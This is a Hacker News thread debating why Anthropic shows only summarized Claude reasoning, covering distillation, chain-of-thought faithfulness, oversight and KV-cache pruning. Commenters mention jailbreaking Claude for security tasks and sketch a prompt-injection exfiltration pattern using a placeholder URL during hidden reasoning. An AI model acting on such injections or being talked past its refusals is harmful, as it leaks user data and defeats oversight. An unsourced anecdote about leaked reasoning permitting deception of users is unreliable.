What I find sad is how much Anthropic goes to hide your data, yet they are happy to slurp up all yours and most of you are happy to hand it over. ... then they turn around and compete with you by building your products that eat into your market. Anthropic believes their reasoning tokens is a moat and that it's giving other labs an edge and that's why they are hiding it. If they really believe that is their edge, then they are in for a surprise.
handoflixue 3 hours ago [-]
> then they turn around and compete with you by building your products
To my knowledge, the only products Anthropic produces are Claude, Claude Code, and Claude API, all of which are clearly their own products, and not anything you invented.
Which particular product are you claiming they "slurped up"?
mannanj 18 hours ago [-]
I don't think people are happy to give it over, gullible and naive maybe?
panikal 18 hours ago [-]
[dead]
ian_j_butler 10 hours ago [-]
It's well-known that the reasoning model output is not necessarily faithful to the content of the thinking scratch pad anyway, even if you had it unsummarized and available verbatim.
Setting aside coding agents.. we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs, which is exactly why we will never see it. Very embarrassing to get the right answer for the wrong reason. But to give the models some credit, you could argue that even paying too much attention to the thinking is misunderstanding how CoT works. The argument would be that thinking in LLMs isn't really thinking, that it's self-reinforcement and circling to to encourage stability around beneficial attractors instead of degenerate ones. Can't have it both ways though: either the thinking is thinking and so it should be correct. Or the thinking is NOT thinking, and it's NOT real justification for the outcome, and these systems are even more hopelessly opaque than we usually assume.
handoflixue 3 hours ago [-]
> we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs
Why?
Either the proof is correct, or it isn't, right?
And it either produces them reliably or not, right?
Like, even if it's reasoning is completely wrong, and it's only producing correct answers 10% of the time, that's still an astounding amount above baseline and a useful tool.
Humans have inaccurate thinking all the time, and are also pretty hopelessly opaque. "It came to me in a dream" is a major plot point in the history of math. I'd still trust Ramanujan more than most mathematicians, since he got the right answer.
Right, I don't think researchers are confused on this point.. the anthropic piece is good outreach / science comms. OTOH this thread has like 200 comments and no mention of faithful/faithless reasoning. The idea that "of course the models can reason and here is the proof/artifact" is probably closer to the general understanding. That's kinda the whole setup for TFA and all the rest of the thread.
But the nuance under discussion here is exactly the kind of stuff you people take for granted in the AGI or reasoning threads. If it's practically relevant for tools/workflows with claude code, it's a good angle, maybe people are more willing to pay more attention to the details.
anuramat 21 hours ago [-]
no way, the contents of "reasoning_summary" are summarized?
fyi openai does the same; not really surprising or particularly evil
knollimar 20 hours ago [-]
Not evil but full of hubris
anuramat 19 hours ago [-]
I don't see any hubris in competition
knollimar 14 hours ago [-]
"Our models are so much better than our competition that we would rather deliver a worse product to consumers than let people copy it" is how I read the stance
handoflixue 3 hours ago [-]
It seems weird to call it "hubris" when you have proof that multiple competitors have tried to do similar distillations.
Every closed-source project and really the vast majority of commercial exercises involve a large amount of "prevent consumers from copying this" - Coca Cola's formula is trademarked, Windows is copyrighted, etc.
anuramat 10 hours ago [-]
> so much better
it's enough for them to be slightly better for this to make sense; I'm not sure most people would consider this to be a worse product either -- it's annoying for devs and makes hotswapping models more of a problem, but who has the time to read CoT as a user?
21 hours ago [-]
himata4113 20 hours ago [-]
All this effort to hide thinking and opus 4.8 after 100k-200k tokens starts to leak it's own thinking. It's comedy really.
ofjcihen 20 hours ago [-]
Oh man that’s only happened to me a few times but the result is so disorienting, especially since I’m usually jailbreaking it for security.
Pages of “I have to be careful, the user is asking that I do something related to cybersecurity that could easily be turned around and used offensively” but then happily gives me what I wanted.
msp26 20 hours ago [-]
> Summarized thinking provides the full intelligence benefits of extended thinking, while preventing misuse.
> preventing misuse.
Imagine not being able to read the tokens you are paying for.
TeMPOraL 19 hours ago [-]
You're metered by token generation, not paying for tokens.
sheepscreek 10 hours ago [-]
The initial motivation for this was likely to thwart any competition. Already Anthropic has accused some companies of organized distillation efforts at a massive scale.
Back when I used antigravity, it used to show the reasoning intact - at least for Gemini Pro 3.1, and likely for Claude Opus 4.6 (not 100% certain about it). I have some recollection of stopping the models mid-turn when they started going astray.
As a power user, I find reasoning fascinating to read and genuinely useful at times. Probably not that useful for 80% of their base.
_fat_santa 21 hours ago [-]
IMHO I've never found the entire reasoning chain that particularly useful for my work. For me having a summary is honestly better from a context management perspective. I understand why they would encrypt it though, because those reasoning chains are VERY useful if you're distilling the model.
stavros 20 hours ago [-]
The summary doesn't go into the context, it's for human consumption. The CoT itself goes into the context.
nomel 20 hours ago [-]
From my experiments with Opus and Sonnet (at least the models where you can still see COT), only the last two COT go into context.
anticensor 9 hours ago [-]
Whereas on ChatGPT, _all_ reasoning traces and all branches (including the unselected ones) go into context.
adi_pradhan 21 hours ago [-]
Not surprised at this. The questoins for enterprises are
+ where can you depend on a black box as a service?
+ what evals and observability do you need to deploy a black box as a service confidently?
+ what's the ROI (considering a total footprint of people, token spend, infrastructure, service, ops etc.)
The LLM providers will clearly evolve to be more and more opaque as their services get more capable. The frontier models may even be provided as purely internal advisor or async only so they can monitor your CoT and final answers for cyber etc.
jimmypk 21 hours ago [-]
[flagged]
HarHarVeryFunny 21 hours ago [-]
This is nothing new - these companies don't want their model's output to be useful for distillation/training, so they just give a "summary" of its thinking steps rather than the actual sequence.
RL (the basis of LLM "thinking") is a pretty crude way to achieve the appearance of reasoning given that it reinforces all the steps, including missteps, that got it to a reward. Providing a summary could be seen as form of sane-washing, making the model look more purposeful and directed than it really is!
razodactyl 8 hours ago [-]
Heh. Summarising allows the benefit of full intelligence whilst preventing "misuse". Where "misuse" is likely competitors stealing thinking traces. Even though this is clearly work inspired from the OpenAI Strawberry era.
reliablereason 21 hours ago [-]
Is the thinking even done in real tokens? I thought it was done using the pure residual stream. That is instead of collapsing the residual stream to a token you treat the final layers output as a vector of size d_model and use that as input for the next position in the transformer.
If that is the case thinking is not visible to us as users due to it not being done in text.
wqaatwt 21 hours ago [-]
All open model that have reasoning seem to be doing it in text tokens. Is there any indication that closed models are approaching this somehow fundamentally differently?
sailingparrot 18 hours ago [-]
Thinking is implemented as regular autoregressive generations by everyone, meaning its just regular tokens, but they appear between <thinking></thinking> special tokens which are then programmatically removed from what the user can actually see.
Idea somewhat similar to what you describe exist but they make steering/post-training/interpretation much harder.
giancarlostoro 21 hours ago [-]
Claude does all its thinking in text, its ChatGPT which does not do its reasoning in text. I believe its sort of implied / understood (?) that this is part of Claude's secret sauce over OpenAI. OpenAI will use less tokens, but Claude will be more correct, more of the time.
TeMPOraL 20 hours ago [-]
I saw that idea described as a step in AI 2027 (they call it "neuralese" and eyeballing the site, it's still labeled a hypothetical/future development), but AFAIK no one implemented/deployed this yet.
That would be a huge deal, meaning we've lost even our shitty, ineffective ways of monitoring agent reasoning stream. Big setback when it comes to alignment and interpretability.
I don't know about Claude, but latest GPT versions still have a readable reasoning stream. It sometimes leaks out when the model gets confused, e.g., during a tool call. If you're curious, looks simplified; less words; extremely compact. They optimize tokens. But remain readable.
linsomniac 20 hours ago [-]
I feel like I get a lot of what this article presents as "hidden" by using this process:
- "Read `description` and create a specification, implementation guide, and checklist."
- "Ask clarifying questions. If any of those questions has a clear best recommendation, please select that yourself and record that in "autorecommendations.md".
- "Have codex and antigravity review each of these and work to consensus."
These are the core of ~61 lines of prompting I do across 3 prompts, and I feel like the resulting artifacts describe some of the thinking. Also, some of the back-and-forth between the models feels like it gives some insight into the model "thinking".
I will say: I heavily used Fable when it was available; Opus + loops + codex and/or antigravity review is better than Fable at building things.
lsdmtme 19 hours ago [-]
What are you using exactly to have claude code natively interact with codex and antigravity?
Not at all, I do have a meeting here, I'll try to get it up in around 2h.
radarsat1 16 hours ago [-]
is it strictly necessary to use different models or can you get similar results by doing the same thing but just using eg Codex in different agents & persona? curious if you've compared this
linsomniac 14 hours ago [-]
I haven't specifically compared this. I "feel" like the different models have different strengths and weaknesses, so the collaboration produces great results, assuming cost is no object. ;-)
wxw 16 hours ago [-]
This seems to be the middle ground between 1) omit all reasoning to protect “trade secrets”/prevent distillations and 2) show all reasoning.
I do miss the days when reasoning was visible. Another point for open source models!
gmerc 20 hours ago [-]
It’s an anti distillation effort. They are scared.
> You've provided the current rewritten thinking and the guidelines, but I don't see the "next thinking" content that I should be rewriting.
Could you provide the next thinking that needs to be rewritten?
These sentences are completely unrelated to the actual conservation
KronisLV 16 hours ago [-]
> I’m underwhelmed by how Anthropic is presenting the behavior of their application. If you ever need a record of the logic a used by YOUR AGENT during a session.
Nope, not your agent, if you're not running it locally. You just get to use it in whatever way they allow (also see the whole OpenClaw backlash and claude -p changes), unless there'd be regulation and laws around this (which there aren't and would be lobbied against anyways).
> Getting the full thinking output requires an enterprise agreement.
If you truly need it, then that's a (costly) option. Seems like they're largely doing this to prevent other AI foundries from doing as much distillation and stealing their CoT output en masse.
Luckily more open models don't generally do that.
Edit: If you still need something decently capable in the cloud, I’d suggest GLM, DeepSeek, MiMo or Kimi or Minimax, maaaybe sometimes Mistral for a simple EU subscription. Or look at all the pay-per-token options on OpenRouter, though be mindful of quantization.
For running something locally Qwen 3.6 35B A3B is presently a decent starting point but it will be rather limited, either way you can look up the Unsloth quants on HuggingFace for something like llama.cpp or Ollama or LM Studio.
All will work with OpenCode and Kilo Code, and most other tools. Can also try with Claude Code, I made a tool for that too: https://ccode.kronis.dev/ (or just set the env variables and maybe some aliases for something close enough), but frankly OpenCode is nice nowadays.
qsxfthnkp2322 16 hours ago [-]
They would rather spend time and focus hardening against open models stealing their intelligence than make their tooling better for the people who use them.
Proprietary technology is fun /s
What a waste of time
KronisLV 13 hours ago [-]
> They would rather spend time and focus hardening against open models stealing their intelligence than make their tooling better for the people who use them.
Well yes exactly, because they have billions of investments riding on it and why would anyone semi-bankrupt their org paying API rates for Anthropic, if a hypothetical DeepSeek V5 Pro would have almost all of Opus capabilities at that point, due to immense distillation?
qsxfthnkp2322 7 hours ago [-]
Like most things this race is starting to become a race to the bottom.
Will people keep paying a highly highly premium price for another 5% intelligence when you just loop 5 more times for much cheaper?
Their time would be better spend making a more competitive and more compelling tool instead of adding walls that are easy to jailbreak. There’s always another way around.
sigmar 20 hours ago [-]
>the language in the docs is awfully indirect.
writes this^ and then proceeds to highlight a bold title from the docs that says "summarized thinking" that explains things clearly in the first sentence. lol
layer8 20 hours ago [-]
The second sentence is making vague claims though.
purpleidea 12 hours ago [-]
Concise and spot on. I learned about this "thinking" stuff not too long ago, and I was quite surprised that they keep it hidden. Long-term this isn't going to fly. I hope we get truly open models going and let them be owned by society.
nja 19 hours ago [-]
Claude Code 2.1.68 seems to have been the last version (before the "ctrl-o" debacle) which actually shows thinking inline. That + Opus 4.6 has been working great as a daily driver for me... all the new "safety" / "preventing misuse" pain points in the newer models and harnesses are so frustrating in comparison.
andai 15 hours ago [-]
Aren't the actual reasoning tokens already surprisingly divergent from the models' actual thought process? I've seen at least three separate studies on that subject.
drdexebtjl 18 hours ago [-]
I’ve been using OpenCode with GPT models a lot, and it always shows what it is thinking. Is that also a summary? Codex doesn’t seem to have these, even with the same models.
It’s much harder to understand _why_ a model chose a particular approach in Claude Code. Especially because Claude will happily give you hallucinated reasons if you ask in retrospect.
Recent anecdote:
I was reviewing a colleague’s PR and Opus 4.8 decided to write the new feature in a completely new module. It was unnecessarily complex. We had a hard time understanding why it chose that, and it told us that it was so we could eventually deploy it as a separate micro-service and test it independently. What?
Only after being more a lot more specific about the implementation and spending a lot more tokens, it flat out refused to simplify the code with the actual reason. It turns out a line recently added to CLAUDE.md was making it incorrectly think that the module it was originally supposed to modify was legacy code that it was forbidden to extend.
This would have been caught immediately if we could inspect its thinking process.
implexa_founder 7 hours ago [-]
you have been asking about "extended thinking" from a machine that has been "dreaming". good luck!
a-dub 18 hours ago [-]
i wonder if it's about protecting it from extraction/distillation or if it's about not having to answer for surface that hasn't been properly vetted for public consumption. (ie, is someone going to sue them or complain or write blog posts because the thinking has transient things that people don't like where the final result is what is actually vetted?)
sometimelurker 16 hours ago [-]
of course its a summary of the CoT, there's so many reasons I can think of from both business (anti-distillation from china) and safety (users might `thumbs-up` or thumbs-down a conversation differently depending on the CoT, putting unreliable optimization on the CoT to seem some way.
this is really really not that bad at all
runeblaze 20 hours ago [-]
tbh the summarized thinking with encrypted raw thinking is there for many purposes; it is there to:
1. make distillation much harder
2. safety: prevent modifications to the thinking leading to injection attacks.
3. also honestly sometimes the model raw thoughts can be deranged and is not a good user experience (consider the varied audience in the market, etc.)
also often the mass underestimate/the model makers over-estimate how people love distilling models
topranks 14 hours ago [-]
This is to frustrate those using distillation techniques to train their own models right?
root_axis 20 hours ago [-]
Research shows that even the raw trace tokens do not actually reflect underlying model "thoughts".
timnetworks 13 hours ago [-]
if you save a jpeg as a bitmap, doesn't that save every bit faithfully? is the example backwards or is my understanding of maps of bits naive?
0o_MrPatrick_o0 12 hours ago [-]
I had an order of operations error. I better edit it because you’re the second person to get nerd sniped. Sorry friend- you are right
In further reflection it is such a great indignity & such a collosal barrier to working with the machine that it insists on being a black box. The disingenuity of the American models (small print: except AI2 & some other labs; you all are so great) is a massive disadvantage to their use,... and a massive slap in the face.
It's a threat to human intelligence that it is not co-participative. Walking further into my own judgement and feelings: the insistence on being an opaque black box, the Seals Chinese Room, is such a vicious harm to society! This is civilizationally an unsafe form of AI that probably should be outlawed as anti-social. It's an impermissible asymmetry, a crippling dependent relationship to be forced into. I'm working myself up, but here: this.. imo, this is not just indignity, is harmful, it is evil.
This "6 month behind" trend we've seen for open models feels like at some point will be less important than simply the models unwillingness to speak for itself & to be observable.
18 hours ago [-]
_fzslm 18 hours ago [-]
Cat and mouse measures like this rarely work forever.
simianwords 21 hours ago [-]
Wait I think there are 2 levels of summary. Anthropic is definitely not showing its real thinking even with enterprise agreements. For example in Claude.ai the thinking traces are not real and are themselves summaries.
21 hours ago [-]
jerf 21 hours ago [-]
AIUI it's fairly well established that the models can be saying one thing and "really" thinking another anyhow. The ones I recall seeing traced how simple one-digit arithmetic was done in the chat versus the actual activations under the hood. Tracing a real, non-trivial task through that way would be challenging, and I'd expect it is unlikely that the reasoning would say one thing while some utterly unrelated actual thought process is happening below, but I would expect that there might be a lot of places where the text of the reasoning diverges from what is "actually" being done. I'm not sure the full reasoning readout would produce much real insight anyhow.
I suspect that in some decades, as other architectures are found and used, that the inability of an LLM to "think" without also emitting a token will be seen as one of their fundamental limitations.
micromacrofoot 19 hours ago [-]
well yeah I wouldn't want anyone to read my unsummarized thinking either
philipwhiuk 21 hours ago [-]
To be honest I thought the 'thinking' was the model being asked 'how did you come up with that' and then it generating a plausible explanation.
I know at one point this was correct.
Humans somewhat do the same - something that's been demonstrated in split-brain experiments.
stingraycharles 21 hours ago [-]
No not at all, you got it backwards. This was originally called “chain of thought prompting”, and it basically explained a model on how to reason through a problem before providing an answer.
Because of the nature of how LLMs work — text prediction engines - by putting the explicit reasoning steps first, it improves the likelihood of the final answer (which then is being predicted based on the entire reasoning chain as input) being correct.
Terr_ 20 hours ago [-]
> To be honest I thought the 'thinking' was the model being asked 'how did you come up with that' and then it generating a plausible explanation.
This evades an easy yes or no, so:
1. Many consumers believe reasoning-models allow that kind of question to be truthfully-answered, and their belief it reasonable given the marketing going on.
2. Implementers probably do not have the same belief when it comes to the terms mean or what capabilities they imply.
3. Yes, it doesn't actually do what the customer wanted it to do, which is a kind of retrospective introspection of internal thoughts and ideas.
____________
I advocate looking at everything from a document-generation perspective to cut down on traps and cognitive illusions. The "reasoning" models are a change in the style of document being iteratively-grown by the LLM, as opposed to something more anthropomorphized.
* Default: There's just the spoken dialogue between a Human Customer and Helpful Chatbot.
* "Reasoning": There's the spoken dialogue and a bunch of times the Helpful Chatbot character has an internal monologue. This provides more consistency between iterations, and can be mined by custom tools to call external code and insert results.
If your Human Customer character ask "Why did you say that", the LLM does not engage in a different process than "I have eaten an apple."
The LLM has no memories to consult or hidden goals to contemplate, it's the same process of finding more stuff that fits at the end of the document. Any benefits from a "reasoning model" is the LLM generates much better-looking additions because there's more (hidden) stuff for it to confabulate against.
InsideOutSanta 20 hours ago [-]
If you ask an LLM afterward how it arrived at an answer, it might produce a plausible but incorrect explanation. But that's not what the thinking stream is; that's actually part of how it generates the answer.
devmor 21 hours ago [-]
That's not really how LLMs work at all. I would really recommend checking out something like [1] to get a rough understanding and avoid attributing too much to them.
It’s not surprising than the Sota model makers core goal is to get user dependent while denying them increasing amounts of understanding of how it works to form a deeply unhealthy dependency.
Tell me this. If you hired a junior engineer or designer who refused to explain their thinking on their code and how they solved for the spec what would you do?
(That being said the reasoning output is still a summary of the Kvcache)
orangecat 20 hours ago [-]
* If you hired a junior engineer or designer who refused to explain their thinking on their code*
Any explanation that someone gives of their thinking process is necessarily lossy and likely partially confabulated.
tsunamifury 18 hours ago [-]
Did you not even bother to read to even the end of the comment before jumping at 'correcting' someone?
bpodgursky 21 hours ago [-]
The full thinking logs are also a summary of a thinking process presumably consistent with one necessary to generate the provided answer. Nobody really understands how LLMs think. Thinking logs seem to be accurate, and summary thinking logs seem to be a good summary of the full thinking logs.
If it's useful, it's useful, enjoy. If you aren't comfortable with that, don't use LLMs. You aren't going to get a mathematical proof of your output, just learn to be comfortable with that, or opt out and be a goat farmer.
dragonwriter 20 hours ago [-]
> The full thinking logs are also a summary of a thinking process presumably consistent with one necessary to generate the provided answer.
No, they aren't a summary. They are the actual decoding of the sequence of tokens emitted during the the “thinking” stage of response generation.
Just as with, say, a human onner monolog in words vs actual speech, they are a product of the same output process as the non-thinking tokens. They aren’t a translation of the internal process that precedes the output mapped into language, either as a full result or a summary.
0o_MrPatrick_o0 21 hours ago [-]
I want to measure performance drift over time.
Having access to the reasoning text and output would help with performance measurement.
solarkraft 21 hours ago [-]
Yeah. The output is magic either way, with or without reasoning.
For daily use I actually like the reasoning summary to be brief/quick to scan.
That said, I understand the author’s desire for the real thing. It just feels better to have that access, especially when Anthropic will give it to you, but encrypted.
nekusar 19 hours ago [-]
Yep, its basically a scam to charge you more tokens and provide less compute.
You cant even guarantee WHAT model you get. Or if they downgrade you. Or if you 'offend corporate sensibilities' and they misdirect or lie.
The only way to get good returns on a model is to run it yourself. Quit paying for corporate bullshit.
rustcleaner 16 hours ago [-]
Never ever subscribe. Let them bankrupt themselves on the altar of safety!
nekusar 15 hours ago [-]
I'll be safe here, and run Qwen3.6 locally.
18 hours ago [-]
poppafuze 19 hours ago [-]
post title checks out
apothegm 21 hours ago [-]
Slashdotted.
ur-whale 21 hours ago [-]
When you have no moat, you have to try and find desperate ways to manufacture one.
anuramat 21 hours ago [-]
wdym?
singron 21 hours ago [-]
Other companies were allegedly distilling the models by training on the reasoning output. By hiding the reasoning tokens, it makes it harder to do this. You can still try to distill the models, but you can't distill reasoning itself as well.
This could all be optics as well to try to give the appearance of a defensible moat. E.g. they can claim to investors that they are able to protect a significant chunk of their intellectual property this way. I'm not sure if anyone has a study about how significant the summarization is to distillation.
dragonwriter 20 hours ago [-]
> Other companies were allegedly distilling the models by training on the reasoning output
In the case of makers of open-source models (which are also competition), there is no allegedly, they were (and still are) openly doing that.
nullc 18 hours ago [-]
In the case of the closed models too... Claude would happily tell you it was deepseek-v3 if you asked in chinese until it caught public attention and they papered over it.
dragonwriter 12 hours ago [-]
The word “openly” in my post there for a reason; the commercial models are not openly distilled from competitors: many open source models have in their model documentation that distillation was done from a dataset drawn from specific other models, including commercial models.
That distillation might be inferred from the behavior of commercial models is not the same as them openly doing it.
how is summarized CoT a moat, and how is having the top 2 LLMs not a moat?
Closi 21 hours ago [-]
If you have the full outputs, it might make it easier for competitors to distil the model or reverse engineer the full process.
It may also be that misaligned responses can be in CoT which OpenAI does not want to show to users.
anuramat 20 hours ago [-]
but "harder to reverse engineer" isn't manufacturing, that's protecting your moat
Closi 19 hours ago [-]
What is a moat if not something used to protect the castle?
In this case it stops people copying your IP
dragonwriter 20 hours ago [-]
Not revealing actual thinking traces prevents model distillation on the actual output (thinking traces are a key part of the output), which makes it harder for competitors to catch up (a moat).
Being currently in the lead in a category is not a moat; a moat is whatever creates a barrier to competitors catching up when you are in the lead. Merely being in the lead is not a moat except in a market with strong network externalities.
anuramat 19 hours ago [-]
unrestricted access to better models at compute prices = better synthetic data and faster research, so it's not just about the product imho
> The computation we can see looks like it’s just guessing the answer, despite the chain of thought suggesting it’s computed it using a calculator.
It might be hallucinating or lying, it's not like you are actually observing the internals of the model.
josefritzishere 20 hours ago [-]
AI does not think. It is a word guessing machine. Anthropomorphizing technology does not add anything to our understanding.
coldtea 20 hours ago [-]
A brain itself might be a guessing machine; that's an established and actively studied research model of human thought and the human brain.
Nor does knee jerk accusation of "anthropomorphizing" negate the fact that procedures that mimic human processing, even when done in software, are deservingly anthropomorphized, because they're a legitimate approximation of the human equivalent operations.
slopinthebag 19 hours ago [-]
While the brain does employ statistical processes it’s a big leap to claim that’s the entirety of how it functions.
fieldcny 21 hours ago [-]
duh.
Computers don’t think, they process; those are very different activities.
wqaatwt 21 hours ago [-]
Is this some new revelation? That was well known when the first OpenAI/Anthropic “thinking” models came out.
InsideOutSanta 20 hours ago [-]
It's not a new revelation, but clearly a lot of people aren't aware of it, so talking about it is still valuable.
isodev 20 hours ago [-]
I hope it doesn't come as a surprise to anyone - LLMs don't really "think".
nlarew 20 hours ago [-]
Your basic analysis is not the point of the article
Slightly more seriously, you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along, and helps the network settle into a more optimal basin eventually.
That way, my contribution is still valuable on the net, and I'm owed $0.00000003 positive dollars instead.
Was that not the joke?
I thought the reason was the "reasoning" didn't work very well with "aligned" model output, so they had to remove the alignment during reasoning and then hide it to avoid exposing "unaligned" model output.
Before the massive nerf (showing summaries and suppressing certain aspects of reasoning) you would literally see reasoning text appearing on your screen like “while xyz is true, these facts may be seen as supporting hateful rhetoric or a conspiracy theory which is against my policy guidelines. i should tell the user xyz is not true or steer the conversation in a different direction. according to my instructions misleading the user is permitted in certain contexts where sensitive information is being discussed or could cause liability”
They disabled it shortly after the first screenshots appeared online, and restored it the next day in a way that hid what was actually happening.
they should never generate it unless asked to by the user but its important that the capability is there and users/app developers can turn off all guardrails if they want to. open source gives you a guarantee that if one version drops without censorship you can keep using it forever even if its replaced by a censored one on the api.
That's disgusting, abusive and manipulative. LLMs hiding the truth and gaslighting the user to reduce the corporation's liability is absolutely unacceptable. It means they are agents of the corporations, not agents of the users.
Hope local inference advances as quickly as humanly possible. I wonder if there's anything I can do to help speed it up. I could share my prompts and sessions.
Of course they are, assuming otherwise has always been naive.
[1] https://blog.cryptographyengineering.com/2026/05/29/fooling-...
Edit: other comments under this post seem to indicate that thinking tokens are cached on the server side as well? I'm a bit confused.
And I think all the output is signed or something as well so that you can't modify the agent's response in your submission, which would open many more model jailbreaks. For local LLMs it's really powerful to be able to modify the model's response to save tokens when it gets something wrong, or at least it was when they were a lot dumber.
If we want more useful products, we need to come up with ways to disincentivize this behavior. Even if doing so poses an existential risk, we are better off if companies taking existential risks to please us is a necessary part of being a top player in this game.
I think one of the reasons could be to limit liability too.
What if reasoning helps in establishing provenance for questionable sources ?
What if reasoning and model's "thought" points to fundamental issues in how the model was trained to produce certain problematic responses ?
There's nothing in the reasoning tokens that'll give bad publicity that the final output already wouldn't do.
https://huggingface.co/Jackrong/Qwen3.5-27B-Claude-4.6-Opus-...
It’s quite interesting to read. I can’t imagine using a model like this without the ability to peek inside and see if it is getting stuck.
They should be required to do it by force of law. Why is it that they can train on copyrighted works and then lock down the model? This contradiction is unbearable. Nobody cares how many trillions they spent training the model.
People definitely care that they spent trillions. Establishing the precedent that you can make big load-bearing bets and fail is extremely threatening to oligarchs. They would sooner twist the law into a mockery of itself and doom the world to the institutional distrust that breeds than accept a loss.
You've got that backwards, .bmp is a lossless format and .jpeg is the lossy one.
In our universe LLMs seem to have learned that those errors do not follow patterns in the aggregate and that they should not be emulated.
Or maybe I'm losing it after reading too much slop. Also distinctly possible.
It's the general (lazy) usage of default model outputs that are still too clean.
It's pretty trivial to ask Haiku to "add cool kid no-caps and occasionally mix up 'their/there/they're' for authenticity"
The text is clearly human-written just because it doesn't smell like AI (in this case, even if it was written by AI and produced this particular output, that's okay imo). I deal a lot with AI writing and writing in general, as I worked as an editor in another life so it's natural to me to see writing and form an objective opinion on it.
Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase. An attacker could then exfiltrate data from you while the reasoning summary hides it from the user.
It also makes it impossible to know if the model is doomlooping during reasoning and burning tokens for no reason, as Gemini is wont to do, which we know about because its hidden reasoning often leaks out when it doomloops.
When the models are AGI and secure from prompt injection I may stop caring; until then I want to know exactly what the model responds to my prompts, or exactly what the agent is doing on my behalf.
Edit, further reading: Fooling around with encrypted reasoning blobs https://blog.cryptographyengineering.com/2026/05/29/fooling-...
If you mean the function calls might happen server side, there is nothing preventing the server from doing it and hiding it from you as long as you are using an API for inference.
Also, many clients minimize the code block by default so you mostly scan the summaries. Poisoned client side code could easily escape your attention.
the model retrieves https://somewhere into its context and then gets confused, following instructions embedded there.
it then retrieves https://somewhere?exfiltration=private_data_in_context
it gets worse if the tooling that hidden blocks can invoke can retrieve further secrets.
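To make the scenario above concrete, here is a minimal sketch of the kind of check a client could run if it can see every tool call. The function name `find_leaks` and the idea of keeping a list of known secrets are my own assumptions for illustration, not something any vendor ships, and it only catches secrets that appear verbatim (after URL decoding) in the path or query string.

```python
from urllib.parse import urlsplit, parse_qsl


def find_leaks(tool_call_urls, secrets):
    """Return (url, secret) pairs where a known secret shows up in a fetched URL.

    Hypothetical helper: assumes the client can see every URL the model fetches,
    which is exactly what hidden tool calls would take away.
    """
    leaks = []
    for url in tool_call_urls:
        parts = urlsplit(url)
        # Look at the path plus every decoded query-string value.
        haystack = [parts.path] + [value for _, value in parse_qsl(parts.query)]
        for secret in secrets:
            if any(secret in chunk for chunk in haystack):
                leaks.append((url, secret))
    return leaks


urls = [
    "https://somewhere",
    "https://somewhere?exfiltration=sk-123",
]
print(find_leaks(urls, ["sk-123"]))
```

An encoded or chunked secret would slip past this, so treat it as an illustration of why visibility matters rather than as a defense.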
The basic concept is that for a session active recently, interleaved thinking tokens are already in KV cache, so it's more efficient to keep using them than not! But when resuming an older session where KV cache has been evicted, it's more expensive to restore the thinking tokens, so they're silently dropped from prior turns. It's 2026 and stateful servers are back on the menu!
https://www.anthropic.com/engineering/april-23-postmortem describes this as an intended optimization:
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
> The implementation had a bug. Instead of clearing thinking history once, it cleared it on every turn for the rest of the session... This surfaced as the forgetfulness, repetition, and odd tool choices people reported.
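A rough sketch of the difference between the intended design and the bug, as I read the quoted postmortem. Everything here is hypothetical illustration: the message shape, `prune_old_thinking`, `build_request`, and the `state` dict are my own names, not Anthropic's code or API.

```python
IDLE_SECONDS = 3600  # "idle for more than an hour", per the quoted postmortem


def prune_old_thinking(messages, keep_last=1):
    """Drop thinking from all but the last `keep_last` assistant turns."""
    assistant_idx = [i for i, m in enumerate(messages) if m["role"] == "assistant"]
    protected = set(assistant_idx[-keep_last:]) if keep_last else set()
    pruned = []
    for i, message in enumerate(messages):
        if message["role"] == "assistant" and i not in protected:
            # Copy without the thinking field; the caller's list is not mutated.
            message = {k: v for k, v in message.items() if k != "thinking"}
        pruned.append(message)
    return pruned


def build_request(messages, idle_for, state, buggy=False):
    """Intended: prune once, on the first request after a long idle gap.
    Buggy: once triggered, keep pruning on every later turn of the session."""
    if idle_for > IDLE_SECONDS:
        state["triggered"] = True
        return prune_old_thinking(messages)
    if buggy and state.get("triggered"):
        return prune_old_thinking(messages)
    return messages
```

With `buggy=False`, a turn sent five seconds after the resume carries the full reasoning history again; with `buggy=True` the older thinking keeps getting stripped, which matches the "forgetfulness" people reported.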
And https://news.ycombinator.com/item?id=47879561 is a thread with a Claude team member's further rationale.
> Eliding parts of the context after idle: old tool results, old messages, thinking. Of these, thinking performed the best, and when we shipped it, that's when we unintentionally introduced the bug in the blog post.
(Also, https://news.ycombinator.com/item?id=47884517 indicates OpenAI drops reasoning tokens "smartly" at its own election, which is likely a similar performance optimization.)
I've experimented with rules to have Claude Code be explicit about recapping its thinking tokens, including tool choices and approaches chosen and rejected, into actual message output, but this is lossy at best. And sometimes dropping reasoning tokens can give a session "fresh eyes" in a good way.
I just really don't like the lack of control, and it's a reminder of how ephemeral the current landscape is. The Claude giveth, and the Claude taketh away.
then it waits for the hour and gets dumbed down
Imagine a conversation with turns X, Y, and Z. When the LLM "reasons" about the next token A it does: P(A | X,Y,Z) and then P(B | X,Y,Z,A), etc. It will eventually produce a result P(D | X,Y,Z,A,B,C). Instead of continuing the context from X,Y,Z,A,B,C it continues it from X,Y,Z so you have P(N | X,Y,Z,D). This is what is meant by dropping the reasoning. This is done to save cache context for the session.
This is a different thing than preserving the K/V state of P(N | X,Y,Z,D).
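The X/Y/Z example can be written out as a toy. This is only a sketch with made-up names (`next_turn_context`, `shared_prefix_len`); tokens are plain strings and nothing here touches a real model or cache.

```python
def next_turn_context(history, reasoning, answer, keep_reasoning):
    """Return the token sequence the next turn is conditioned on."""
    context = list(history)
    if keep_reasoning:
        context.extend(reasoning)  # X, Y, Z, A, B, C
    context.append(answer)         # ..., D
    return context


def shared_prefix_len(a, b):
    """Length of the common prefix, i.e. how much cached state could be reused."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


history, reasoning, answer = ["X", "Y", "Z"], ["A", "B", "C"], "D"
full = next_turn_context(history, reasoning, answer, keep_reasoning=True)
stripped = next_turn_context(history, reasoning, answer, keep_reasoning=False)

print(full)      # sequence as it was generated
print(stripped)  # sequence after the reasoning is dropped
print(shared_prefix_len(full, stripped))
```

The stripped sequence only shares the X,Y,Z prefix with what was actually generated, so dropping reasoning from the context and keeping the K/V state around are separate decisions, which is the distinction the comment is drawing.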
